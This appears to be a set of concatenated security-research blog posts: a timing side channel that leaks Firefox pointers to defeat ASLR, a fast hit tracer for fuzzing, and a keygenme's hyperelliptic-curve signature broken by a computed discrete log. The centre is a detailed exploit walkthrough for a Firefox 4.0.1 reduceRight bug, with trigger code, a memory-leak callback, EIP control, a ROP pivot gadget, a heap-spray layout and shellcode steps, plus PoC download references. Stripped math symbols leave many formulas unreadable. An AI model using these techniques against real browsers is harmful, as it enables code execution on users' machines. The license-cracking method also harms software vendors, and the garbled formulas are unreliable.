Consider a hash table using double hashing [2]. In this scheme, keys are hashed like so: mod , where , are hash functions and is the size of hash table. During insertion, is incremented until a free slot is found, like shown below:

Lookups are performed the same way — is incremented until key value in a slot matches, or the slot is empty.

It’s easy to see that the execution time of is proportional to the length of ‘s chain (number of collisions). In the above example , since there were two collisions. The idea is to use this fact to learn the value of key being looked up. Firefox is nice enough to store pointers and user supplied integers in the same hashtable (not always, but in specific circumstances), so we can control the table’s layout completely. It worth noting that only the object’s pointer is used in hashing, so (contents of strings are not taken into account).

Here’s how we are going to layout keys inside the table (using JS integers):

Yellow slots are taken, white are free. We have to leave some free space, since FF grows / shrinks tables dynamically, basing on the number of taken slots.

If we keep generating JS objects (with different pointers) and trying to look them up in , we will finally find one that takes considerably longer than others to lookup. Let’s call this object (M – max., str – string, since we are using strings (atoms, to be more precise) in POC) and the lookup time of : .

Here’s an example of a long chain for (Firefox uses subtraction instead of addition while hashing):

In this example .

In order to find , we will use the observation that divides for any (this isn’t always true, but I’ll omit the second case for brevity). Indeed, = = . If we collect enough of chain’s elements, we can calculate their differences and take . This equality holds with high probability — chance of failure decreases exponentially with the number of collected elements (the most significant term of the exact formula is ).

How to find elements on ‘s chain? Remember that keys used to fill are integers. We can remove a key and check if changed significantly. If it did, we know for shure that the removed key belongs to the chain.

Here’s an example:

We removed and this caused , so the lookup time after removal () is going to be lower than . In order to deal with inaccuracies of the JS clock (Date object), we will accept only elements for which , so we are reducing our interest to the first half of the chain (red line on the diagram above). Without this restriction we would be unable to distinguish between keys that don’t belong to the chain and keys at the very end of it.

Obviously, removing keys one by one is too slow. Removing them in chunks in a bisect-like manner is better, but still has the running time proportional to . It’s faster to use a randomized algorithm. Let’s say we chose random elements to remove. Probability that we failed to hit any element of ‘s chain is . The exponent is working in our favor, but we need to estimate somehow, so that we don’t waste too much time — is as good as , but the second requires greater , so more elements to test.

We can estimate by collecting **integers** with increasingly long chains, and using their lookup times to create a linear regression model [3]. Model will provide a linear function that interpolates collected data. Estimating is then a matter of evaluating . Below is an example of collected data points and a linear function that fits them best. Y axis is time and X is the chain’s length.

Having we can pick so that for any . After we finally pick , we chose random keys and remove them. If dropped below , it means that in the set we chose, there’s at least one key that belongs to the first part of the chain — we need to find it. In order to do so, we bisect the set of removed keys until only one is left. Running time: , if we disregard time necessary to add / remove keys from .

After collecting enough (8 in POC) elements of chain, we compute . The only thing left is to find — the starting point.

Recall ‘s layout:

Consider how changes, when removing two keys: and — we remove them separately and then measure .

– if we remove 5 or 7, will not change, since 5, 7 do not belong to ‘s chain,

– removing 4 or 6 will cause , since 4 and 6 are in the first half of chain,

– removing 8 will cause and removing 10 will have no effect on .

These 3 conditions are sufficient to recognize if we are inside, outside, or and the edge of chain.

Algorithm to detect the starting point is simple. Start from element for which is smallest (so it’s the closest element to starting point). With we found earlier, do a binary search using the criteria above (inside, outside, hit) until hitting the edge (starting point).

With and it’s possible to recover , which equals to .

This is a simplified description. There’s quite a lot of details that were omitted in this post for brevity, but are required for this trick to work.

I suspect (this type of) timing attacks will be useful for leaking information not only from browsers. The most likely candidates seem to be kernels and perhaps even remote servers. (EDIT: I mean this in ASLR context, not secret-password context).

Here’s the POC. Download all files and open lol.html (in Firefox ;)) to see how it works. POC was tested on xp, w7 and linux. Send me an email if it doesn’t work for you.

1. http://en.wikipedia.org/wiki/Timing_attack

2. http://en.wikipedia.org/wiki/Double_hashing

3. http://en.wikipedia.org/wiki/Linear_regression

The idea is:

- collect a lot of sample files
- let your target application parse them all
- collect the set of basic blocks executed for every file
- calculate the minimal set of samples that covers all of the collected basic blocks
- flip random bytes in files from that set and wait for a crash

It’s a simple process, but all implementations I heard of suffer from an interesting performance bottleneck in the basic block tracing part.

If your tracer takes >1min per file, you can speed it up to take only few seconds, with just a few simple observations.

The tracing part is generally implemented like this:

- instrument the binary with PIN and install a common hook for every BB
- when a BB is executed, control is transferred to the hook, which stores the BB address in a “fast” data structure implementing a set, a like red-black/avl tree.
- run the application on a sample file and terminate it when the CPU usage drops below some cutoff value.

There are few problems with this approach, but they are easy to solve.

First, let’s distinguish between tracing and hit tracing. In both cases we will assume basic block (BB) granularity.

1. During **tracing**, we are interested in collecting an ordered sequence of BBs, so we want to know which BBs were executed and in what order.

2. During **hit tracing**, we are only interested in collecting a set of executed BBs, so we don’t care if a BB was hit more than once.

From this point, “tracing” should be interpreted as 1, and “hit tracing” as 2, the same goes for “tracer” and “hit tracer”.

For example, consider the following function:

a: dec eax jnz a b: test eax, eax jz d c: nop d: no

Tracing that example for eax=3 would produce a list: [a,a,a,b,d], and hit tracing, a set: {a,b,d}.

It’s easy to see, that when implementing a hit tracer, hooks can be dynamically removed as soon as a BB is executed. Indeed, since we save BBs in a set, any attempt to store the same one more than once is a waste of time.

To make the bigger picture clear:

- install hooks in all BBs
- when a BB is hit, execution transfer to the hook
- hook saves the BBs address in a set
- hook uninstalls instelf from the hit BB
- hook transfers control to the originating BB

We’ve eliminated the first problem of the MM (Miller’s method ;)). The second problem is termination: when should we stop collecting BBs?

Watching the CPU is counterproductive: if the processor is busy, it has to be in some kind of a loop (unless you feed it with gigabytes of consecutive NOPs :p). If it’s in a loop, it’s pointless to wait for an extended period of time, because you’re going to collect all of the loops’ BBs at the very beginning anyway.

A better (faster) approach is to watch how many new BBs we collected in a predefined timestep. To be more precise, let (the size of the BB set at time ). Using this notation, every seconds we check if . If the condition is true: continue, if not: terminate. This guarantees that we terminate as soon as the set stops increasing fast enough (or a called OS function takes a lot of time, but that can be solved with big enough ).

This heuristic is inferior in situations where the target spends a lot of time in disjoint loops: if we have loop1(); loop2(); and loop1 takes a while, then the target will be terminated early, before reaching loop2.

There are few ways to implement the hit tracer:

– script your favourite debugger

– use PIN/DynamoRIO

– write your own debugger

Scripting ImmDbg, WinDbg, or PyDbg is a bad idea: with >100k breakpoints these tools are likely to fail :). PIN is probably a good tool for this task (it’s a Binary Dynamic Instrumentation tool, after all ;)), but we’ll focus on the last option.

Assuming our target is not open source, we need to find a way to hook all BBs at the binary level. The first solution that comes to mind is:

- use IDA to statically collect all BBs
- patch all of them with a jump to our hook

There are two problems with this approach:

- jumps have to be long (5 bytes), so they might not fit into very small BBs
- IDA isn’t perfect and can produce incorrect results. Patching an address that isn’t a beginning of a BB can (most likely will) lead to a crash.

Solving problem 1 can be either simple and inaccurate or complicated but accurate. A quick solution is to ignore BBs shorter than 5 bytes and patch only the bigger BBs. This can be ok, depending how many BBs are going to be discarded: if just a few, then who cares ;).

If there’s a lot of them, we’re going to use a different approach. Instead of patching with jumps, we can patch with **int 3** (0xCC) — since it’s only one byte, it will fit everywhere ;).

When a BB is executed, int 3 will throw an exception that needs to intercepted by our external debugger. This introduces a penatly that’s not present in the jump method: kernel will have to deliver the exception from the target application to the debugger, and then go back to resume execution of the patched BB. This cost is not present, when a jump transfers execution to a hook inside the target’s address space, but it turns out that this delay is negligible.

The debugger contains the hook logic including a data structure implementing a set. Notice that we can be faster, although by a constant factor, than AVL/RB trees. Having a sorted list of addresses of BBs (call it L), we can “implement” a perfect hash [2]: Hash(BB)=index of BB in L, so our set can be a flat table of bytes of size = size(L). The “insert(BB,S)” procedure is just: S[H[BB]]=1, without the cost of AVL/RB bookkeeping/rebalancing :). The cost of Hash(BB) is obviously , since the list of addresses is sorted.

Solving 2 might seem to be a matter of observing where the patched application crashed and reverting bytes at that address to the original values. That might work, but doesn’t have to :). If a bad patch results in a bogus jump, the crash address will be completely unrelated to the real origin of the problem!

The correct solution is a bit slow:

def check_half(patches): apply_patches(exe, patches) crashed = run(exe) if crashed: revert_patches(exe, patches) if len(patches)>1: apply_non_crashing(patches) def apply_non_crashing(patches): fst = half(0, patches) snd = half(1, patches) check_half(fst) check_half(snd)

Starting with a clean exe and a list of patches to apply, we split the list into halves and apply them in order. If the patched version crashes, we revert made changes and recurse with one of the halves. At the tree’s bottom, if a single byte causes a crash, we just revert it and return.

It’s easy to see, that this algorithm has complexity (disregarding file ops) where is the number of defects (bad patches that cause crashes) and is the total number of patches (basic blocks). The factor comes from the fact, that we are traversing a full binary tree with nodes.

I didn’t bother comparing with available (hit)tracers, since just judging by the GUI lag, they are at least an order of magnitude slower than the method described. The executable instrumented with int3s has no noticeable lag, compared to the uninstrumented version, at least on manual inspection (try clicking menus, etc).

We’ll benchmark how much (if at all) the monotonicity heuristic is faster than just waiting for a fixed amount of time T. This models a situation where the target takes ~T seconds to parse a file (using ~100% CPU).

Follow these steps to repeat the process yourself:

- download this
- download the first 150 pdf files from urls.txt (scraped with Bing api ;)), delete 50 smallest ones, and place what’s left in ./samples/ dir
- run SumatraPDF.exe and uncheck “Remember opened files” in Options (otherwise the results would be a bit skewed — opening a file for the second time would trigger cache handling code)
- run stats.py and wait for results

Files in the archive:

- SumatraPDF.exe – version without instrumentation (no int3 patches)
- patched.exe – instrumented version
- debug.exe – debugger that’s supposed to intercept and resume exceptions raised from patched.exe
- urls.txt – urls of sample pdf files
- stats.py – benchmarking script

The debugger takes few parameters:

<exe> <sample file> <dt> <c> <timeout>

where exe is the instrumented executable, sample file is the file to pass as a first parameter to the exe, dt and c have the meaning as described above, and timeout is the upper bound of time spent running the target (debugger will terminate the target, even when new BBs are still appearing). dt and timeout are in milliseconds, c is a float.

Every sample is hit traced two times. First time, debugger is run with

parameters:

patched.exe <sample> 1000 0.0 2000

meaning there is no early termination — BBs are collected for 2 seconds.

Second time, debugger is run with:

patched.exe <sample> 200 1.01 2000

meaning the target is terminated early, if during 200ms the number of BBs didn’t

increase by at least 1%. Here’s the watchdog thread implementing this:

DWORD WINAPI watchdog(LPVOID arg){ int i, elapsed; float old_counter=0; elapsed = 0; printf("watchdog start: g_c=%.02f, g_delay=%d, g_timeout=%d\n", g_c, g_delay, g_timeout); while(1){ Sleep(g_delay); elapsed += g_delay; if((float)counter > g_c*old_counter){ old_counter=(float)counter; } else{ break; } if(elapsed>=g_timeout) break; } dump_bb_tab("dump.txt"); printf("watchdog end: elapsed: %d, total bbs: %d\n", elapsed, counter); ExitProcess(0); } It dumps the BB list in dump.txt as a bonus ;).

Speed: **0.37** (smaller is better)

Accuracy:** 0.99** (bigger is better)

As expected, the monotonicity heuristic performs better (almost 3x) than just waiting for 2 seconds, for the price of 1% drop in accuracy.

Note that the 2s timeout is arbitrary and supposed to model a situation when the target is spinning in a tight loop. In such a case watching the CPU is (most likely) a waste of time.

If you want your hit tracer to be fast, then:

- remove the BB hook after first hit
- use simple data structures
- for termination, consider different conditions than watching the CPU

References

1. Charlie Miller, 2010, Babysitting an army of monkeys: an analysis of fuzzing 4 products with 5 lines of Python, http://tinyurl.com/cwp5yde

2. Perfect hash function, http://en.wikipedia.org/wiki/Perfect_hash_function

]]>In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Window 7, by leaking imagebase of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies.

You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger:

xyz = new Array; xyz.length = 0x80100000; a = function foo(prev, current, index, array) { current[0] = 0x41424344; } xyz.reduceRight(a,1,2,3);

Executing it crashes Firefox:

eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208 eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mozjs!JS_FreeArenaPool+0x15e1: 004f0be1 8b14c8 mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=????????

eax holds a pointer to “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of given array in reverse order, so if the read @ 004f0be1 succeeds and we won’t crash inside the callback function (foo), JS interpreter will loop the above code with decreasing values in ecx.

Value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before of after the array, by setting/clearing the 29th bit of length. Neat :).

During reduceRight(), the interpreter expects jsval_layout unions:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 274 typedef union jsval_layout 275 { 276 uint64 asBits; 277 struct { 278 union { 279 int32 i32; 280 uint32 u32; 281 JSBool boo; 282 JSString *str; 283 JSObject *obj; 284 void *ptr; 285 JSWhyMagic why; 286 jsuword word; 287 } payload; 288 JSValueTag tag; 289 } s; 290 double asDouble; 291 void *asPtr; 292 } jsval_layout;

To be more specific, we are interested in the “payload” struct. Possible values for “tag” are:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 92 JS_ENUM_HEADER(JSValueType, uint8) 93 { 94 JSVAL_TYPE_DOUBLE = 0x00, 95 JSVAL_TYPE_INT32 = 0x01, 96 JSVAL_TYPE_UNDEFINED = 0x02, 97 JSVAL_TYPE_BOOLEAN = 0x03, 98 JSVAL_TYPE_MAGIC = 0x04, 99 JSVAL_TYPE_STRING = 0x05, 100 JSVAL_TYPE_NULL = 0x06, 101 JSVAL_TYPE_OBJECT = 0x07, ... 119 JS_ENUM_HEADER(JSValueTag, uint32) 120 { 121 JSVAL_TAG_CLEAR = 0xFFFF0000, 122 JSVAL_TAG_INT32 = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, 123 JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED, 124 JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, 125 JSVAL_TAG_BOOLEAN = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN, 126 JSVAL_TAG_MAGIC = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC, 127 JSVAL_TAG_NULL = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL, 128 JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT 129 } JS_ENUM_FOOTER(JSValueTag);

Does it mean we can only read first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no. Observe how the interpreter checks if a jsval_layout is a number:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 405 static JS_ALWAYS_INLINE JSBool 406 JSVAL_IS_NUMBER_IMPL(jsval_layout l) 407 { 408 JSValueTag tag = l.s.tag; 409 JS_ASSERT(tag != JSVAL_TAG_CLEAR); 410 return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET;

So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number.

This isn’t the end of good news, check how doubles are recognized:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 369 static JS_ALWAYS_INLINE JSBool 370 JSVAL_IS_DOUBLE_IMPL(jsval_layout l) 371 { 372 return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR; 373 }

This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff 0000 0000 0000 0000 isn’t really a problem — we are just throwing out NaNs.

Knowing that most of values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences.

var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); //decode with JSPack later } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; //stop dumping } }

Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_value of type OBJECT, manipulating it later will cause an undesired crash.

Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in .code section, or pointers to data structures in .data, but how to find them? After all, they change with every run, because of varying image base.

By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to .data section, differing by a constant (0×304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0×304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va – ptr_rva).

It’s a heuristic, but it works 100% of the time .

Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1” if the “payload.ptr” field points to an area filled with \x88:

eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888 eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0 ov up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06 mozjs!js::mjit::stubs::SetElem$lt;0>+0xf9: 655301a9 8b4764 mov eax,dword ptr [edi+64h] ds:002b:888888ec=???????? 0:000> k ChildEBP RetAddr 0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567] 0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619] 0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857] 0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932]

We are using \x88 as a filler, so that every pointer taken from that area is equal to 0x88888888. Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped :P.

It seems like we can control the value of edi. Let’s see if it’s of any use:

0:000> u eip l10 mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]: 655301a9 8b4764 mov eax,dword ptr [edi+64h] 655301ac 85c0 test eax,eax 655301ae 7505 jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5) 655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30) 655301b5 8b54241c mov edx,dword ptr [esp+1Ch] 655301b9 6a00 push 0 655301bb 8d4c2424 lea ecx,[esp+24h] 655301bf 51 push ecx 655301c0 53 push ebx 655301c1 55 push ebp 655301c2 52 push edx 655301c3 ffd0 call eax 655301c5 83c414 add esp,14h 655301c8 85c0 test eax,eax

That’s exactly what we need — value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3.

Where does edi value come from?

0:000> u eip-72 l10 mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]: 65530137 8b7d04 mov edi,dword ptr [ebp+4] 6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0) 65530140 8b5c2414 mov ebx,dword ptr [esp+14h] 65530144 7563 jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9)

edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union.

It’s now easy to see how to control EIP. Trigger setElem on a controlled jsval_layout union (by executing “current[0]=1” in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT, and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy ;).

Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP.

!mona rop -m "mozjs" -rva

“-m” restricts search to just mozjs.dll (that’s the only module with known image base)

“-rva” generates a chain parametrized by module’s image base.

I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX.

There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to layout.ptr field in our fake object. First idea is to use any function’s epilogue:

mov esp, ebp pop ebp ret

as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since:

65530137 8b7d04 mov edi,dword ptr [ebp+4]

that would mean [ebp+4] has to be a return address and a pointer to a function pointer called later @ 655301c3.

We have to modify EBP before copying it to ESP. Noticing that during SetElem, property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget:

// 0x68e7a21c, mozjs.dll // found with mona.py ADD EBP,EBX PUSH DS POP EDI POP ESI POP EBX MOV ESP,EBP //(1) POP EBP //(2) RETN

This will offset EBP by a controlled ODD value. Unicode chars in JS have two byte chars, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with new EBP value popped @ (2) and executing the same gadget from line (1).

This is how our fake object has to look like:

+------------+ | | 9 13 17 v------------+----------------------------------------------------------------------+ |pivot_va | ptr | 00,new_ebp,mov_esp_ebp,00 | new_ebp2 | ROP ... normal shellcode ... +-----------------------+-----------------------------------------------------------+ 0 4 8 | 18 22 | ^ | | +-------------------+

pivot_va – address of the gadget above

new_ebp – value popped at (2) used to realign the stack to 2

mov_esp_ebp – address of (1)

new_ebp2 – new value of EBP after executing (2) for the second time, not used

ROP – generated ROP chain changing memory perms

normal shellcode – message box shellcode by Skylined

Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory:

low addresses +---------------------+ +-------+ ptr | 0xffff0007 | ^ | +---------------------| | | | | | | | . | | | | . | | | | . | | | +---------------------| | half1 | +----+ ptr | 0xffff0007 | | | | +---------------------| | | | | . | | | | | . | | | | | . | | | | | | v | | +-----end of half1----+ | | | | ^ | | | | | | | | | | margin of | | | . | | error | | | . | | | | +---------------------+ v +--|---> fake object | | +--^------------------+ | | | . | | | | . | +-----+ | | | | | +---------------------+ high addresses

Our spray will consist of two regions. First one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with fake objects described above.

If you run the PoC exploit on Windows XP, this is how (most likely) the heap is going to look like:

Zooming into of the 1MB chunks:

Notice how our payload is aligned to 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. Beginning of the array is used to store metadata, and the actual data starts @ +4KB. It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes and, in effect, allocating too much memory for objects (including strings), so instead of nicely aligned strings in array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec.).

This is how the fake objects from the second part of spray look like:

Four NOPs at the bottom mark the end of mona’s ROP chain.

- Leak mozjs’ image base, as described above.
- Spray the heap with JS, as described above.
- Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating array’s length used in reduceRight().
- Calculate the length of the array (xyz in the trigger PoC) so that the first dereference should happen in the middle of first half of the spray. Aiming at the middle gives us the biggest possible margin of error — if the spray’s starting address deviates from expected value by less than size/2, it shouldn’t affect our exploit.
- Trigger the bug.
- Inside JS callback, trigger SetElem, by executing “current[4]=1”. In case of a JS exception (TypeError: current is undefined), change array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing ;).
- See a nice messagebox, confirming success

PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes).

Assuming that the PoC is the first and only page opened in Firefox, probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region.

Get the PoC here.

]]>In this blog post, I will try to introduce HE curves, and how to use them in crypto. Using that knowledgle, it will be easy to analyze and break a signature scheme implemented in keygenme #2 by Dcoder. Note that this won’t be a rigorous mathematical dissertation, but a “tutorial” for mathematically inclined programmer :).

The most general definition of an elliptic curve, is

.

is just a set of points fulfilling an equation that is quadratic in terms of and cubic in . By introducting a special point (point at infinity) it’s possible to equip with “point addition“, turning it into an abelian group.

Hyperelliptic curves are more complicated. HE curve of genus over a field is defined as:

where , , , and monic. Elliptic curves are hyperelliptic curves with . To define addition on , we need to jump through few mathematical hoops :).

Consider rational functions over algebraically closed field. Let . It’s easy to see, that is a zero of . It’s also evident, that .

If for a given , , we will say that has a **pole** at . When , we will say that has a pole at infinity. This is to provide intuition, just remember that pole at infinity == function is not bound at infinity. To be able to compute order of such pole, compute order of pole of .

is a zero of order for , if is the largest integer, such that , where is a rational function. Order of a pole is similar: is a pole of order if is the largest integer, such that . Notice we are allowed to factor this way, because we are working over an algebraically closed field, and because of fundamental theorem of algebra.

In our example, has a zero of order 3 at , a pole of order 2 at and a pole of order 1 at infinity.

Another example. Let . is a zero of order 5. We also have a pole at infinity. To compute its order, we need to know the order of of , so order = 5.

Consider set of rational functions over , where HE curve is defined over . “Over” means our function acts on points of , so for , arguments and satisfy “for free”.

To keep track of zeros and poles of a function, we can use a **divisor**. You can think about them as multisets allowing negative number of elements. For example, let have a zero of order 2 at , zero of order 1 at , pole of order 2 at and pole of order 1 at infinity. Divisor of is . Note that divisors aren’t supposed to be evaluated (plus and minus signs are not for point addition/subtraction), they are just “lists”, or “multisets” of zeros/poles. You can look at like it’s a list: .

More formally, for a nonzero rational function on , its divisor is given by

where almost all of coefficients are zero (there are finitely many nonzero). is defined as:

- , if is a zero of order ,
- , if is a pole of order ,
- 0, if is neither a zero, nor a pole.

is “order of vanishing of function at point “. For details see [1] (page 8). You can assume that computing orders works like for ordinary rational functions, so it’s ok to factor nominator / denominator, etc (this isn’t 100% true, but that’s not imporant).

To continue, we need

**Theorem 1**

*Let be a rational function on , then .*

For proof, see theorem 4.6, page 9 in [1]. This theorem is useful for computing divisors. For , compute zeros of and (poles of ) and check if their orders (using definition of above) sum to 0. If not, add / subtract point at infinity.

We can add / subtract divisors, by adding / subtracting like terms. For example, let (over complex numbers), where (genus 1 curve), , .

To find we need to know zeros and poles of . Since , there are 3 points on with : . There are two points with : . Points are zeros and are poles, so ( was added to satisfy theorem 1). Similary ().

Now, , where . You might notice, that . Indeed, it’s true that:

From the above properties, it follows that set of divisors of rational functions (we will call them principal divisors) form a subgroup of all divisors . We will denote subgroup of divisors of degree 0 (with sum of coefficients equal to zero) as . Theorem 1 implies that .

Here comes the magic part.

We define quotient group as:

is called the degree zero part of the Picard (or divisor class) group of .

For a hyperelliptic curve of genus , there exists an abelian variety of dimension which is isomorphic to . is called the Jacobian of .

You can safely disregard the magic part above. The important thing to know is that with HE curves, we perform operations on its Jacobian. has its own group law, that uses reduced divisors in their Mumford representation.

If you want to just implement HE crypto, you can treat Cantor’s algorithm and Mumford representation as blackboxes given by mathematicians, but I think it’s useful to know how divisors work and what Mumford polynomials represent.

It’s time to analyze our target and show some examples.

Dcoder implemented polynomial operations on his own, so we are forced to identify them by hand, by looking at the disassembly. This part is easy, so I’ll skip it :).

What’s not easy is identifying the protection scheme, without knowing how HE crypto works. There are many clues that the keygenme implements elliptic curve crypto. For example, here’s a top level view of a part of the verification procedure:

decode_serial(&part4, &part3, &part2, &part1); serial_part12 = __PAIR__(part2 << 32 >> 32, part1); v20 = part3; f1(&k1_Px, &k1_Py, &f, &h, &Px, &Py, part3 + (part4 << 32)); f1(&k2_Qx, &k2_Qy, &f, &h, &Qx, &Qy, serial_part12); f2(&k1_Px, &k1_Py, &f, &h, &k1_Px, &k1_Py, &k2_Qx, &k2_Qy);

Looking inside f1, we see:

do { f2(&a3a, &v13, f, h, &a3a, &v13, &a3a, &v13); if ( k & (1i64 << v7) ) f2(&a3a, &v13, f, h, &a3a, &v13, in_x, in_y); --v7; } while ( v7 >= 0 );

This looks like double and add algorithm for elliptic curves, so our hypothesis is that f1 is point multiplication and f2 point addition. We can verify this by feeding values to these functions and checking their output. For example, computing P+P and 2*P should produce the same result. Quick check shows that’s indeed the case.

With high level functions identified, it’s easy to see that we are dealing with Nyber-Rueppel signature scheme. In order to emit correct signatures, we need to solve an instance of discrete logarithm problem.

Even without knowing that we are dealing with HE curves, we can just rip the code for point addition and use it as a blackbox in Pollard’s kangaroo (lambda) algorithm. Kangaroo attack works in all groups and uses only addition and multiplication in that group. Running time is , where is the interval containing the discrete log.. Notice that we can’t use Pollard’s rho (which is faster by a constant), because rho requires group’s order as a parameter and we have no means to compute it without knowing what group we are dealing with.

Even with Pollard’s kangaroo, we still need to know how large the order is. If it’s too big, then perhaps we need to be smarter about finding this DLOG. We can obtain a rough estime, by observing what kind of points we are getting out of point addition/multiplication procedures.

Quick inspection in debugger shows, that coordinate is always a monic polynomial of degree at most 4, and a polynomial of degree at most 3. Since we are working with polynomials over with , there can be at most (we expect our curve to be symmetric, thus the additional 2 factor) such points in our mysterious group :). It’s a lot, but remember that kangaroo attack has a running time of , so in our case which is low enough for kangaroo to be practical.

Knowing we are dealing with hyperelliptic curve, we can be more specfic about group’s order — we can actually compute it exactly and this will allow us to use Pollard’s rho, instead of kangaroo.

Here are the params, in SAGE format:

x = GF(8191)['x'].gen() f = 3076 + 1177*x + 6969 * x^2 + 294*x^3 + 6512*x^4 + 7340*x^5 + 5891*x^6 + 3050*x^7 + 0*x^8 + 1*x^9 H = HyperellipticCurve(f) J = H.jacobian() X = J(GF(8191)) Px = 1875 + 1721*x + 5809*x^2 + 5647*x^3 + 1*x^4 Py = 6019 + 3070*x + 1666*x^2 + 688*x^3 Qx = 4134 + 2027*x + 4475*x^2 + 4255*x^3 + 1*x^4 Qy = 6525 + 928*x + 1361*x^2 + 6937*x^3 P = X([Px,Py]) Q = X([Qx,Qy]) O = P-P frob = H.frobenius_polynomial() order = frob(1) dlog = 3414275298009790 print order*P == O, dlog*P == Q

Running the above in SAGE will produce *True, True* on output, which means order of jacobian and the dlog are indeed correct.

The HE we are working on is , where and , so genus . Since we are working with polynomials over , with , jacobian will be defined over .

Order of jacobian is given explicitly by , where is its characteristic (Frobenius) polynomial (page 6, [2]).

